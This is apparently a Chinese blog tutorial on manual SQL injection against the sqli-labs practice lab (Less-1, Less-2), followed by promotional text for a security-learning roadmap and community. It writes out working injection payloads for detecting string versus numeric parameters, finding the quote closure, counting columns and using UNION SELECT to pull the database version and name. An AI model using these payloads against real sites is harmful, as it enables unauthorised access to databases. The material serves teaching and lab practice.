本文详细介绍了SQL注入的步骤,包括找到注入点、判断字符型和数字型、处理闭合方式、判断字段列数以及回显位置的检测。同时强调了系统化学习网络安全的重要性,提供了一条网安学习成长路线图和实用工具资源。
1,sql注入的步骤
1),找到注入点
2),判断是什么类型
字符型
数字型
判断方法:
?id=1 and 1=1 一式
?id=1 and 1=2 二式
一式和二式显示的结果一样,则是字符型,不一样则是数字型
#注释:简单方法,看?id=1,和?id=2,以及?id=2-1,id=1和?id=2-1一直则是数字型,
?id=2和?id=2-1一致则是字符型,原理:因为字符串不能进行加减运算
Less-1(字符型注入)
Less-2(数字型注入)
3)若是字符型,判断闭合方式(数字型直接掠过)
闭合的作用,手工提交闭合符号,结束前一段查询语句后面即可加入其他语句,查询需要 的参数,不需要的语句可以用注释符号‘–+‘或者’#‘ 或 者’%23‘注释掉
闭合方式有下面几种 ’ " ') ")
先尝试?id=1’
浅浅分析一下报错信息,说你有错误的SQL语句在里面,并显示了报错信息就在下面这句话附近 ‘‘1’’ LIMIT 0,1’ 。
我们把这句话拿出来
’ ‘1’ ’ LIMIT 0,1 ',通过分析不难发现,多出来一个" ’ ",由此推断闭合方式应该是以单引号闭合。
4)判断字段列数
利用group by 或者 order by 采用二分法进行判断字段
?id=1’ group by 6 --+
?id=1’ group by 3 --+
判断可能有三列
5)查询回显位置
这里先介绍一种联合查询 union
?id=1’ union select 1,2,3–+
正常回显判断可能是因为只显示一行,这里我们使用?id=-1’ 或者 ?id=0’等进行尝试
?id=-1’union select 1,2,3–+
2,3的位置得到回显可以在2,3的位置进行查询注入
我们看一下当前数据库和版本信息,方便之后操作
?id=-1‘union select 1,version(),database()
一、网安学习成长路线图
网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
二、网安视频合集
观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
三、精品网安学习书籍
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
四、网络安全源码合集+工具包
光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
五、网络安全面试题
最后就是大家最关心的网络安全面试题板块
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
扫一扫
480
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
